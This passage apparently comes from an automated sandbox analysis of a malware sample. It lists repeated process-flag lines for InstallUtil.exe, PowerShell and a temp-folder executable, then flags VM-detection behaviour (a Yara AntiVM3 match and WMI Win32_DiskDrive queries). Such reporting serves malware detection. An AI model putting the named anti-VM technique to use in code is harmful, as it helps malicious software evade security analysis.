                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: txxbiwtbs.exe PID: 3624, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
